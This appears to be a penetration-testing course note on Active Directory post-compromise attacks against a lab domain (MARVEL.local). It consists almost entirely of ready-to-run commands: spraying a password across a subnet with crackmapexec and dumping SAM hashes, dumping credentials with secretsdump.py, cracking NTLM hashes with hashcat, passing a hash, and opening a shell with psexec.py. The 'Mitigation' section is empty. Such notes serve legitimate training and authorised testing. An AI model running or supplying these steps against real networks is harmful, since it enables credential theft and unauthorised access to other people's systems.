Post Compromise Attacks

Pass the Password:

Installing crackmapexec:

Always put the protocol (smb) before the target address; recent crackmapexec versions require it (crackmapexec smb <target> ...).

Dumping hashes with crackmapexec (sprays one password over the subnet and dumps the SAM where it works):

crackmapexec smb 10.10.10.0/24 -u fcastle -d MARVEL.local -p Password1 --sam

Dumping hashes with secretsdump.py:

secretsdump.py marvel/fcastle:Password1@10.10.10.138

Crack NTLM Hashes with Hashcat:

NTLM (NT hash, as dumped from the SAM) - module 1000

NetNTLMv2 (challenge/response captured on the wire, e.g. with Responder) - module 5600

You can pass around NTLM (NT) hashes. You CANNOT pass around NetNTLMv2 hashes: they are tied to a challenge, so they have to be cracked first.

hashcat.exe -m 1000 hash2.txt D:\WPA\PT\RESOURCES\wordlists\RockYou\rockyou.txt -d 1 -O

hash2.txt holds one NT hash per line (the fourth field of the dump). -d 1 selects the OpenCL/CUDA device, -O enables the optimized kernels (faster, but caps the maximum password length).

Pass the Hash:

We use crackmapexec again to pass the hash over the network. --local-auth authenticates against the local SAM of each host instead of the domain; drop it when passing a domain account's hash:

crackmapexec smb 10.10.10.0/24 -u "Frank Castle" -H 358a34f0c492afc079d6ad206b4ce273 --local-auth

Attempt to get a shell. The -hashes value is LM:NT; aad3b435b51404eeaad3b435b51404ee is the fixed "empty" LM hash, the NT half is the one that matters:

psexec.py "frank castle":@10.10.10.129 -hashes aad3b435b51404eeaad3b435b51404ee:358a34f0c492afc079d6ad206b4ce273

Mitigation:
